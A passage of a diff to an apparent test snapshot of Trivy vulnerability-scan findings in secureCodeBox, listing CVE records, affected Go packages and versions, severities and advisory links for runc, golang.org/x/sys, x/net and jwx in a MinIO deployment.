fix changes \`runc exec --cap\` behavior such that the additional capabilities granted to the process being executed (as specified via \`--cap\` arguments) do not include inheritable capabilities. In addition, \`runc spec\` is changed to not set any inheritable capabilities in the created example OCI spec (\`config.json\`) file.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "runc: incorrect handling of inheritable capabilities", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://avd.aquasec.com/nvd/cve-2022-29162", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://access.redhat.com/errata/RHSA-2022:8090", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://access.redhat.com/security/cve/CVE-2022-29162", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://bugzilla.redhat.com/2086398", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://errata.almalinux.org/9/ALSA-2022-8090.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://errata.rockylinux.org/RLSA-2022:8090", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.2", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://linux.oracle.com/cve/CVE-2022-29162.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://linux.oracle.com/errata/ELSA-2022-8090.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29162", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://www.openwall.com/lists/oss-security/2022/05/12/1", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-28642", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-28642", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", + "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", + "https://github.com/opencontainers/runc/pull/3785", + "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", + "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-28642", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. It was found that AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration. This issue has been fixed in runc version 1.1.5, by prohibiting symlinked \`/proc\`. See PR #3785 for details. users are advised to upgrade. Users unable to upgrade should avoid using an untrusted container image.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-28642", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-28642", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://github.com/opencontainers/runc/pull/3785", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-28642", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-25809", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2023-25809", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", + "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", + "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", + "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", + "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", + "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-25809", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. In affected versions it was found that rootless runc makes \`/sys/fs/cgroup\` writable in following conditons: 1. when runc is executed inside the user namespace, and the \`config.json\` does not specify the cgroup namespace to be unshared (e.g.., \`(docker|podman|nerdctl) run --cgroupns=host\`, with Rootless Docker/Podman/nerdctl) or 2. when runc is executed outside the user namespace, and \`/sys\` is mounted with \`rbind, ro\` (e.g., \`runc spec --rootless\`; this condition is very rare). A container may gain the write access to user-owned cgroup hierarchy \`/sys/fs/cgroup/user.slice/...\` on the host . Other users's cgroup hierarchies are not affected. Users are advised to upgrade to version 1.1.5. Users unable to upgrade may unshare the cgroup namespace (\`(docker|podman|nerdctl) run --cgroupns=private)\`. This is the default behavior of Docker/Podman/nerdctl on cgroup v2 hosts. or add \`/sys/fs/cgroup\` to \`maskedPaths\`.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "Rootless runc makes \`/sys/fs/cgroup\` writable", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468135", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://avd.aquasec.com/nvd/cve-2023-25809", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2023-25809", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-25809", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210817142637-7d9622a276b7", + "packageName": "golang.org/x/sys", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202208-02", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", @@ -73434,7 +74267,7 @@ commonly used by applications.", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], "severity": "MEDIUM", @@ -73442,9 +74275,9 @@ commonly used by applications.", { "attributes": { "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "foundIn": "Target: 'opt/bitnami/common/bin/wait-for-port' / Class: 'lang-pkgs' / Type: 'gobinary'", "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "installedVersion": "v0.0.0-20210510120138-977fb7262007", "packageName": "golang.org/x/sys", "references": [ "https://access.redhat.com/security/cve/CVE-2022-29526", @@ -73473,7 +74306,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "faccessat checks wrong group", "references": [ @@ -73574,507 +74407,911 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": "1.2.26", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "GHSA-rm8v-mxj3-5rmq", + "installedVersion": "v1.2.19", + "packageName": "github.com/lestrrat-go/jwx", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", + "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", + "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", + "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", + "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", + "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "AES-CBC decryption is vulnerable to a timing attack which may permit an attacker to recover the plaintext of JWE data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "github.com/lestrrat-go/jwx vulnerable to Potential Padding Oracle Attack", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - }, - { - "type": "URL", - "value": "https://go.dev/cl/340830", - }, - { - "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - }, - { - "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + 